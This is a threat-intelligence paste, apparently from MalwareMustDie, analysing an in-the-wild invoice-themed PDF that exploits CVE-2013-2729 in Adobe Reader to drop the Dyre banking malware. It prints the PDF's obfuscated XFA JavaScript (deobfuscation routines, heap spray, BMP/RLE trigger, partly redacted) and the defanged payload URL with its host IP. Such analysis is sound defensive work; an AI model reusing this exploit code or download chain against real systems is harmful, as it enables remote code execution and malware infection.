SHARE
TWEET

ITW Campaign of Dyre Malware via Explopit CVE-2013-2729 PDF

MalwareMustDie Oct 15th, 2014 (edited) 1,203 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie! ITW Campaign of Dyre Malware via Explopit CVE-2013-2729 PDF.
  2. // Exploitation: Adobe Reader X BMP/RLE heap corruption
  3. // CVE: CVE-2013-2729
  4. // thanks: @nickschroedl (to force me to wake up+analysing this) @SeraphimDomain (to help recognizing this new malware)
  5. // Tweets:
  6. https://twitter.com/nickschroedl/status/522412815265845248
  7. https://twitter.com/MalwareMustDie/status/522464893090684928
  8. https://twitter.com/SeraphimDomain/status/522464989957746689
  9.  
  10. //-------------------------
  11. // Sample:
  12. //-------------------------
  13. MD5    : 536445d39de9f19947aa493c1ee57751
  14. SHA256 : 6b6fdc4b116802728ec763ac7b25472046465dd0cf58146b3755e7efcb83f135
  15. File size 465.6 KB ( 476741 bytes )
  16.  
  17. // PDFiD
  18.    This PDF document has an invalid cross reference table.
  19.    This PDF document contains AcroForm objects. AcroForm Objects can
  20.    specify and launch scripts or actions, that is why they are often
  21.    abused by attackers.
  22.    This PDF document has 1 page, please note that most malicious PDFs have
  23.    only one page.
  24.    This PDF document has 6 object start declarations and 6 object end
  25.    declarations.
  26.    This PDF document has 2 stream object start declarations and 2 stream
  27.    object end declarations.
  28.    This PDF document has a cross reference table (xref).
  29.    This PDF document has a pointer to the cross reference table
  30.    (startxref).
  31.    This PDF document has a trailer dictionary containing entries allowing
  32.    the cross reference table, and thus the file objects, to be read.
  33.  
  34. // ExifTool
  35.    MIMEType   application/pdf
  36.    FileCreateDate   2014:10:16 04:08:59+01:00
  37.    FileType   PDF
  38.    Linearized   No
  39.    FileAccessDate   2014:10:16 04:08:59+01:00
  40.    Warning   Invalid xref table
  41.    PDFVersion   1.7
  42.    [wait.gif]
  43.  
  44. // VT Metadata (ITW info)
  45.    First submission 2014-10-15 13:31:37 UTC ( 13 hours, 38 minutes ago )
  46.    Last submission 2014-10-16 03:08:49 UTC ( 1 minute ago )
  47.    File names sample.pdf
  48.               VIRUS_invoice621785.pdf
  49.               invoice621785.pdf
  50.               invoice621785.pdf
  51.               invoice621785.pdf
  52.               BAD-invoice621785.pdf
  53.               536445d39de9f19947aa493c1ee57751.pdf
  54.               vti-rescan
  55.               invoice621785.txt
  56.               invoice621785 - Copy.pdf
  57.               invoice621785.pdf
  58.               file-7580290_pdf
  59.               Virus-invoice621785.pdf
  60.               vti-rescan
  61.               invoice621785.txt
  62.               invoice621785.txt
  63.               invoice621785 - Copy.pdf
  64.               invoice621785.pdf
  65.               file-7580290_pdf
  66.               Virus-invoice621785.pdf
  67.               invoice621785.pdf
  68.               invoice621785b.pdf
  69.               invoice621785.pdf
  70.               base64.pdf
  71.               !!!!VIRUS!!!! invoice621785.pdf
  72.               1.invoice621785.pdf
  73.               attch.pdf
  74.               536445d39de9f19947aa493c1ee57751
  75.               invoice621785.pdf
  76.               invoice621785.pdf
  77.               111111111.pdf
  78.               invoice621785.pdf.malware
  79.  
  80.  
  81. // ---------------------------------------
  82. // Hostile script (Javascript detected)
  83. // Analysis is in comment with //MMD: xxxx
  84. // by @unixfreaxjp
  85. // ---------------------------------------
  86.  
  87.          <script name="im" contentType="application/x-javascript">
  88.                                     // MMD: This part of script will trigger shellcode URLDownloadToCacheFileA
  89.          var oxi = "";
  90.          var JH = "";
  91.  
  92.             var VMeaD = function(a){return HqmB.call(a,a);};
  93.             var Q5Bm = "";
  94.  
  95.             String.prototype.trim=function(){return this.replace(/^[\s\n\r\t]+|\s\n\r\t]+$/g, '');};
  96.  
  97.             function ymE4(zzz, sss, sdsds) {
  98.  
  99.                 switch (zzz)
  100.                 {
  101.                   case 1:
  102.                     return AY(sss);
  103.                     break;
  104.                   case 2:
  105.                     return OnVk(sss, sdsds);
  106.                     break;
  107.                   case 3:
  108.                     return Muv0S(sss);
  109.                     break;
  110.                   case 4:
  111.                     return HIZx(sss);
  112.                     break;
  113.                   case 5:
  114.                     return xt4(sss);
  115.                     break;
  116.                 }
  117.  
  118.             }
  119.  
  120.             function EiBY(x){
  121.  
  122.                 return Et(x);
  123.             }
  124.  
  125.             function mG05X(n)
  126.             {
  127.               var w = form2.Text100.name;
  128.               var s = [];
  129.               n = n.trim();
  130.               var m = cMZ(Bu4g8);
  131.                   m = cMZ(oCnr);
  132.  
  133.               var ar = cMZ("[" + m + "]");
  134.               var tt = (w.length > 3) ? 1 : 2;
  135.  
  136.  
  137.               for (var i = 0; i &lt; ar.length; i ++)
  138.               {
  139.                 var a = ar[i];
  140.                 var b = (tt == 1) ? 0x33 : 0x40;
  141.                 var j =  ( a &amp; ~b ) | ( ~a &amp; b );
  142.                 if ((j &gt;= 33) &amp;&amp; (j &lt;= 126))
  143.                 {
  144.                   s[i] = String.fromCharCode(33 + ((j + 14) % 94));
  145.                 }
  146.                 else
  147.                 {
  148.                   s[i] = String.fromCharCode(j);
  149.                 }
  150.               }
  151.               return s.join('');
  152.             }
  153.  
  154.  
  155.             function a2c(a)
  156.             {
  157.             ter="";
  158.  
  159.             for (var i in a)
  160.             ter+= String.fromCharCode(a[i]);
  161.  
  162.             return ter;
  163.             }
  164.  
  165.  
  166. function HqmB(a, b, c, d){
  167.             var x = form2.Text100.name;
  168.             var y = this[a];
  169.  
  170.             x = x + '3';
  171.  
  172.             return y;
  173.             }
  174.  
  175. function parOM(aaa) {
  176.                                         var ret;
  177.                                         var w = form2.Text100.name;
  178.                                         var tt = (w.length &gt; 3) ? 1 : 2;
  179.                                         ret = (tt == 1) ? VMeaD(aaa) : null;
  180.  
  181.  
  182.                                 return ret;
  183.                                 }
  184.  
  185.             var ma = "5t5in55f5o55har5o5ee5a5u5es5a5e";
  186.             var upd = "Srg.rmCCdvlncp";
  187.             var upd0 = "";
  188.             var ii = 0;
  189.  
  190.  
  191.             for (var i=0; i &lt; ma.length; i++)
  192.             {
  193.              if(ma[i] != "5")
  194.               upd0 += ma[i];
  195.                else
  196.                 upd0 += upd[ii++];
  197.  
  198.             }
  199.  
  200.             var cMZ = parOM(upd0.slice(19,23));
  201.             var VUSO = cMZ(upd0.slice(23));
  202.             var ge = [0x33, 0x77, 0x6A, 0x75, 0x71, 0x66, 0x68, 0x6A];
  203.             var z3 = [0x5C, 0x64, 0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x27, 0x29];
  204.             var z4 = [0x5D, 0x2F, 0x67, 0x2C, 0x27, 0x2C, 0x27, 0x29];
  205.             var z1 = [0x28, 0x2F, 0x5B, 0x5E, 0x5C, 0x78, 0x32, 0x46];
  206.  
  207.             for(var q = 0; q &lt; ge.length; q++)
  208.             Q5Bm += String.fromCharCode(ge[q]-5);
  209.  
  210.             var z2 = [0x28, 0x2F, 0x5B, 0x5C, 0x78, 0x32, 0x46];
  211.  
  212.             var Bu4g8 = "n" + Q5Bm + a2c(z1) + a2c(z3);
  213.             var oCnr  = "m" + Q5Bm + a2c(z2) + a2c(z4);
  214.  
  215.          cMZ(mG05X(xfa.resolveNode("Text101").rawValue));   // MMD: draw za BMP as raw!
  216.  
  217.          </script>
  218.  
  219.  
  220.  
  221.          <script name="i3d" contentType="application/x-javascript">
  222.             var D4W=0x12e;         // MMD: These are var & arrays to be used in HeapSpray
  223.             var Ibv2 = 200;
  224.             var of4 = 0;
  225.             var KsK = new Array(Ibv2);  
  226.             var xS = new Array(Ibv2);
  227.             var URP = new Array(Ibv2);
  228.             var cVqW = new Array(Ibv2/2);
  229.          </script>
  230.  
  231.  
  232.          <?templateDesigner expand 1?>
  233.       </variables>
  234.  
  235.  
  236.       <subform w="576pt" h="756pt">
  237.          <field name="Image301">
  238.             <ui> <imageEdit/> </ui>
  239.             <value>
  240.                         <image1>
  241.                         /*soxidoxiVYzoxiyGUaTfdjgpaoejgkldfjgibdialzoaerkgjoxiVYzo
  242.                          xiyGUaTkadfjguikdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgs
  243. dflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghg
  244. fkfhkdertgsdflahegklsdkfbdialzlsdoxiVYzoxiyGUaTkfbdialzaoejgkldfjgibdialzoaerkgjkad
  245. fjguikdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfgh
  246. gfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzlsdkf
  247. bdialzigoushjbnklcnbluaerhtgjsbdialzfdjgpaoejgkldfjgibdialzoaerkgjkadfjkdertgsdflah
  248. egkfgjgk56ujhghdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflah
  249. egklsdkfbdialzfgjgk56ujhialzlsdkfbdialzigoushjbnklcnbluaeoxiVYzoxiyGUaTrhtgjsbdialz
  250. fdjgpaoejgkldfjgibdialzoaerkgjkadfjkdertgsdflahegkfgjgk56ujhghdfghgfkfhkdertgsdflah
  251.                         (...)
  252.                         jeyrhgjkdfgdfg*/
  253.                         </image1>
  254.  
  255.  
  256.                         <image2>
  257.                         /*soxidoxiVYzoxiyGUaTfdjgpaoejgkldfjgibdialzoaerkgj
  258. hdfghgfkfhkdertgsdflahegklsdkfbdialzfgjgk56ujhghdfghgfkfhkdertgsdflahegkoxiVYzoxiyG
  259. UaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiy
  260. GUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaToxiVYzoxiyGUaTlsdkfbdia
  261. lzlsdkfbdialzigoushjbnklcnbluaerhtgjsbdialzfdjgpaoejgkldfjgibdialzoaerkgjkadfjeyrhg
  262.                         (...)
  263.                         jkdfgdfg*/
  264.                         </image2>
  265.  
  266.  
  267.                         <image>
  268.  Qk0AAAAACgAUAAAAAABAAAAALgEAAAEAAAABAAgAAQAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAUkdC
  269. QVJHQkEAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
  270. AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAA
  271. Av8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC
  272.                         (...)
  273. /AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8A
  274. AAL/AAAC/wAAAv8AAAL/AAAC/wAAAv8AAAL/AAAC/wAAAvgAAAgBAAAAAAAnBQACAKsAAgCrAAIA
  275. qwACAKsAAgCrAAIAqwACAKsAAgCrAAIAqwACAKsACkxMTExMTExMTEw=
  276.                        </image>
  277.  
  278.             </value>
  279.          </field>
  280.       </subform>
  281.  
  282.       <event activity="initialize" name="s9"> // MMD: The initiated of this exploit
  283.  
  284.          <script contentType="application/x-javascript">  
  285.                              // MMD: Known exploit: Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption
  286.             var i; var j;    // MMD: prep memory layout
  287.             if (i3d.of4 == 0){
  288.                var VYz = "\u5858\u5858\u5678\u1234";  // MMD: Trigger usage of LFH
  289.                var yGUaT = i3d.D4W/2-1-(VYz.length+2+2);
  290.  
  291.                for (i=0; i &lt; i3d.Ibv2; i+=1)    // MMD: HEAP SPRAY starts here...
  292.                   i3d.KsK[i] = VYz + im.ymE4(1,i) +
  293.                                im.oxi.substring(0, yGUaT) +
  294.                                im.ymE4(1,i) + "";
  295.  
  296.                for (j=0; j &lt; 1000; j++)
  297.                   for (i=i3d.Ibv2-1; i &gt; i3d.Ibv2/4; i-=10)
  298.                      i3d.KsK[i]=null;
  299.                i3d.of4 = 1;
  300.             }
  301.          </script>
  302.  
  303.  
  304.       </event>
  305.  
  306.          <draw name="Text101" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP dats..
  307.             <ui>
  308.                <textEdit/>
  309.             </ui>
  310.             <value>
  311.  
  312.                <text>
  313.                nAB57/Vaod57/ASto19/MqbD19/ibPf19/dUaq19/bsX19/hZqj19/djwh19/sJU19/ciQ74/
  314. wiM68/CyA19/gjVQ95/TAY19/BkG98/hzj30/uPDm117/Onw108/tiEi86/oKIU5/hqE0/JhYZ30/
  315. usK117/YIm108/Bhdo108/MaNB108/PFDn108/JbOL30/CGMs117/VWMI108/yzhj108/yhQB108/xNM108/CjlK30/
  316. oUh117/kZl108/vTFa87/Hhv5/KqKY0/lntm30/OupY117/wKf4/Qtm91/fpK5/vrE84/zAMl30/
  317. zwXA117/Uogl4/qar4/tnt4/Rasi4/afD30/voQK117/Egym87/SQPT1/AkT4/aUb4/DPvN30/
  318.  
  319. // REDACTED //
  320.  
  321. Yxyf19/neFH19/RKma19/LHyB19/OEGp19/Ehz19/Zbg112/IBKF5/xBm118/WEX117/aMe112/nnN12/
  322. NHo19/Weo108/MqI122/SlHY81/mPpX108/sExj81/skCl108/fiNA81/IEM108/wBv81/ajgZ108/HxeO105/
  323. svCP108/wiY122/jDB83/NDq83/IFD83/zmd83/egCw83/inu83/FMI83/jGm83/lns89/qBNI57/
  324. OYo19/EmDw19/aMTN19/IBY19/JrIr19/MYaP19/bCb19/rDP19/YxT19/LcEi19/TMLx19/RbB19/
  325. cWW125/quOE57
  326.                </text>
  327.             </value>
  328.             <font typeface="Myriad Pro"/>
  329.             <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
  330.          </draw>
  331.  
  332.  
  333.          <draw name="Text102" y="6.35mm" x="15.875mm" w="7.375in" h="254mm"> // MMD: BMP dats...
  334.             <ui>
  335.                <textEdit/>
  336.             </ui>
  337.             <value>
  338.                <text>
  339.                HdGi57/SVEQ19/bHL19/IEzq19/EzZ19/dRa19/Mub19/WPhU19/Vlq19/VYc19/volf19/
  340. Dsb19/lhR19/WFD116/lIYx1/FpDd112/lKte19/gMJ9/tcqB89/Xsv19/yMHX116/Shc1/VKU112/
  341. RIW19/xIfM8/NVpN89/WAwg57/YMaE57/QZUu19/cVw19/gmwi19/tmX19/lrD19/FTO19/LDW19/
  342. PYqG19/UjjX19/usBd19/AnCr19/OUN19/fsfs116/EQdz1/nJaF112/vOaF19/IIh69/aUCU85/FkBB19/
  343. XMU95/eWm19/tSCt111/OvPr83/ebSW89/lZp57/GPK19/Agx19/YijV19/DHP19/vYA19/HwHC19/
  344.  
  345.                                  // REDACTED //
  346.  
  347. iOIW125/tmL89/kmi57/ixHF19/tlc19/udz19/tywc19/xuvx19/QURZ19/jzM19/gYAV19/wOlg19/
  348. qMoN19/tADX19/kKlU19/Bqe5/dtnQ116/tux5/aoud12/ZBy118/qsj110/FWr118/FPew1/KlL112/
  349. rXA11/aHLY5/dwa118/lce110/Sxz7/icC14/HdnR115/Eegv119/aAry5/bFE64/MBpo115/nzsy7/
  350. hTK100/REHt118/RFCP112/MvS117/sjLK5/hmK107/QTw89/lcHy57
  351.                </text>
  352.             </value>
  353.             <font typeface="Myriad Pro"/>
  354.             <margin topInset="0.5mm" bottomInset="0.5mm" leftInset="0.5mm" rightInset="0.5mm"/>
  355.          </draw>
  356.  
  357.  
  358.                            // MMD: form layout is rendered and the bug triggered
  359.  
  360.       <event activity="docReady" ref="$host" name="EVde">
  361.          <script contentType="application/x-javascript"> // MMD: runs once the page ready
  362.  
  363. im.cMZ(im.mG05X(xfa.resolveNode("Text102").rawValue));  // MMD: draw za raw!
  364.             </script>
  365.  
  366.       </event>
  367.    </subform>
  368.    <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?>
  369.    <?templateDesigner DefaultLanguage JavaScript?>
  370.    <?templateDesigner DefaultRunAt client?>
  371.    <?acrobat JavaScript strictScoping?>
  372.    <?PDFPrintOptions embedViewerPrefs 0?>
  373.    <?PDFPrintOptions embedPrintOnFormOpen 0?>
  374.    <?PDFPrintOptions scalingPrefs 0?>
  375.    <?PDFPrintOptions enforceScalingPrefs 0?>
  376.    <?PDFPrintOptions paperSource 0?>
  377.    <?PDFPrintOptions duplexMode 0?>
  378.    <?templateDesigner DefaultPreviewType interactive?>
  379.    <?templateDesigner DefaultPreviewPagination simplex?>
  380.    <?templateDesigner XDPPreviewFormat 19?>
  381.    <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
  382.    <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?>
  383.    <?templateDesigner Zoom 119?>
  384.    <?templateDesigner FormTargetVersion 30?>
  385.    <?templateDesigner SaveTaggedPDF 1?>
  386.    <?templateDesigner SavePDFWithEmbeddedFonts 1?>
  387.    <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template>
  388. <config xmlns="http://www.xfa.org/schema/xci/3.0/">
  389.    <agent name="designer">
  390.       <!--  [0..n]  -->
  391.       <destination>pdf</destination>
  392.       <pdf>
  393.          <!--  [0..n]  -->
  394.          <fontInfo/>
  395.       </pdf>
  396.    </agent>
  397.    <present>
  398.       <!--  [0..n]  -->
  399.       <pdf>
  400.          <!--  [0..n]  -->
  401.          <version>1.7</version>
  402.          <adobeExtensionLevel>5</adobeExtensionLevel>
  403.       </pdf>
  404.       <common/>
  405.       <xdp>
  406.          <packets>*</packets>
  407.       </xdp>
  408.    </present>
  409. </config>
  410. <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/">
  411.    <locale name="en_US" desc="English (United States)">
  412.       <calendarSymbols name="gregorian">
  413.          <monthNames>
  414.             <month>January</month>
  415.             <month>February</month>
  416.             <month>March</month>
  417.             <month>April</month>
  418.             <month>May</month>
  419.             <month>June</month>
  420.             <month>July</month>
  421.             <month>August</month>
  422.             <month>September</month>
  423.             <month>October</month>
  424.             <month>November</month>
  425.             <month>December</month>
  426.          </monthNames>
  427.          <monthNames abbr="1">
  428.             <month>Jan</month>
  429.             <month>Feb</month>
  430.             <month>Mar</month>
  431.             <month>Apr</month>
  432.             <month>May</month>
  433.             <month>Jun</month>
  434.             <month>Jul</month>
  435.             <month>Aug</month>
  436.             <month>Sep</month>
  437.             <month>Oct</month>
  438.             <month>Nov</month>
  439.             <month>Dec</month>
  440.          </monthNames>
  441.          <dayNames>
  442.             <day>Sunday</day>
  443.             <day>Monday</day>
  444.             <day>Tuesday</day>
  445.             <day>Wednesday</day>
  446.             <day>Thursday</day>
  447.             <day>Friday</day>
  448.             <day>Saturday</day>
  449.          </dayNames>
  450.          <dayNames abbr="1">
  451.             <day>Sun</day>
  452.             <day>Mon</day>
  453.             <day>Tue</day>
  454.             <day>Wed</day>
  455.             <day>Thu</day>
  456.             <day>Fri</day>
  457.             <day>Sat</day>
  458.          </dayNames>
  459.          <meridiemNames>
  460.             <meridiem>AM</meridiem>
  461.             <meridiem>PM</meridiem>
  462.          </meridiemNames>
  463.          <eraNames>
  464.             <era>BC</era>
  465.             <era>AD</era>
  466.          </eraNames>
  467.       </calendarSymbols>
  468.       <datePatterns>
  469.          <datePattern name="full">EEEE, MMMM D, YYYY</datePattern>
  470.          <datePattern name="long">MMMM D, YYYY</datePattern>
  471.          <datePattern name="med">MMM D, YYYY</datePattern>
  472.          <datePattern name="short">M/D/YY</datePattern>
  473.       </datePatterns>
  474.       <timePatterns>
  475.          <timePattern name="full">h:MM:SS A Z</timePattern>
  476.          <timePattern name="long">h:MM:SS A Z</timePattern>
  477.          <timePattern name="med">h:MM:SS A</timePattern>
  478.          <timePattern name="short">h:MM A</timePattern>
  479.       </timePatterns>
  480.       <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols>
  481.       <numberPatterns>
  482.          <numberPattern name="numeric">z,zz9.zzz</numberPattern>
  483.          <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern>
  484.          <numberPattern name="percent">z,zz9%</numberPattern>
  485.       </numberPatterns>
  486.       <numberSymbols>
  487.          <numberSymbol name="decimal">.</numberSymbol>
  488.          <numberSymbol name="grouping">,</numberSymbol>
  489.          <numberSymbol name="percent">%</numberSymbol>
  490.          <numberSymbol name="minus">-</numberSymbol>
  491.          <numberSymbol name="zero">0</numberSymbol>
  492.       </numberSymbols>
  493.       <currencySymbols>
  494.          <currencySymbol name="symbol">$</currencySymbol>
  495.          <currencySymbol name="isoname">USD</currencySymbol>
  496.          <currencySymbol name="decimal">.</currencySymbol>
  497.       </currencySymbols>
  498.       <typefaces>
  499.          <typeface name="Myriad Pro"/>
  500.          <typeface name="Minion Pro"/>
  501.          <typeface name="Courier Std"/>
  502.          <typeface name="Adobe Pi Std"/>
  503.          <typeface name="Adobe Hebrew"/>
  504.          <typeface name="Adobe Arabic"/>
  505.          <typeface name="Adobe Thai"/>
  506.          <typeface name="Kozuka Gothic Pro-VI M"/>
  507.          <typeface name="Kozuka Mincho Pro-VI R"/>
  508.          <typeface name="Adobe Ming Std L"/>
  509.          <typeface name="Adobe Song Std L"/>
  510.          <typeface name="Adobe Myungjo Std M"/>
  511.       </typefaces>
  512.    </locale>
  513.    <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet>
  514. <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
  515.    <xfa:data xfa:dataNode="dataGroup"/>
  516. </xfa:datasets>
  517. <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26        ">
  518.    <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  519.       <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="">
  520.          <xmp:MetadataDate>2014-08-20T20:14:14Z</xmp:MetadataDate>
  521.          <xmp:CreatorTool>Adobe LiveCycle Designer 11.0</xmp:CreatorTool>
  522.       </rdf:Description>
  523.       <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about="">
  524.          <pdf:Producer>Adobe LiveCycle Designer 11.0</pdf:Producer>
  525.       </rdf:Description>
  526.       <rdf:Description xmlns:desc="http://ns.adobe.com/xfa/promoted-desc/" rdf:about="">
  527.          <desc:version rdf:parseType="Resource">
  528.             <rdf:value>11.0.0.20130303.1.892433.887364</rdf:value>
  529.             <desc:ref>/template/subform[1]</desc:ref>
  530.          </desc:version>
  531.       </rdf:Description>
  532.    </rdf:RDF>
  533. </x:xmpmeta>
  534. <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve">
  535.    <annots/>
  536. </xfdf></xdp:xdp>
  537.  
  538.  
  539. // Exploit: CVE-2013-2729
  540.  
  541. //details:
  542.  
  543. [quoted] Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-2727. [/quoted]
  544.  
  545. [quoted] The issue presented on this CVE is related to the parsing of a BMP file compressed with RLE8.
  546. The bug is triggered when Adobe Reader parses a BMP RLE encoded file embedded in an interactive
  547. PDF form. The dll responsible of handling the embedded XFA interactive forms(and the BMP) is
  548. the AcroForm.api plugin. So in order to get to the bug we first need to reach the XFA code. [/quoted]
  549.  
  550. [quoted] The XML Forms Architecture (XFA) provides a template-based grammar and a set of processing rules
  551. allow business to build interactive forms. At its simplest, a template-based grammar defines fields
  552. in which a user provides data. Among others it defines buttons, textfields, choicelists, images and
  553. a scripting API to validate the data and interact. It supports Javascript, XSLT an FormCalc
  554. as scripting language.  One can build a PDF containing a XFA Form containing an image [/quoted]
  555. Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729
  556.  
  557. // Hostile URL post exploit:
  558. Malicious API download executed: \KnownDlls\NTMARTA.DLL origin: URLDownloadToCacheFileA
  559. h00p://rlmclahore.com/resources/search/1510out.exe
  560. Network: 70.34.33.140|static-ip-70-34-33-140.net-70-34-33-0.rdns.managed.com.|40561 | 70.34.32.0/21 | MOBILENOW | US | POWERDNN.COM | POWER DNN
  561.  
  562.  
  563. // PoC download will be executed per browser/PDF env
  564. https://lh6.googleusercontent.com/-qYEkGH0sWio/VD88vayVXCI/AAAAAAAARZ0/t6UkaJYv32E/s747/003.png
  565.  
  566. Payload: Dyre
  567. https://www.virustotal.com/en/file/3f23306c3b94fc2d594836e972e32f2cc4a19787ed3d561dc0bfe52970798f70/analysis/
  568.  
  569. // ---
  570. // MalwareMustDie!
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top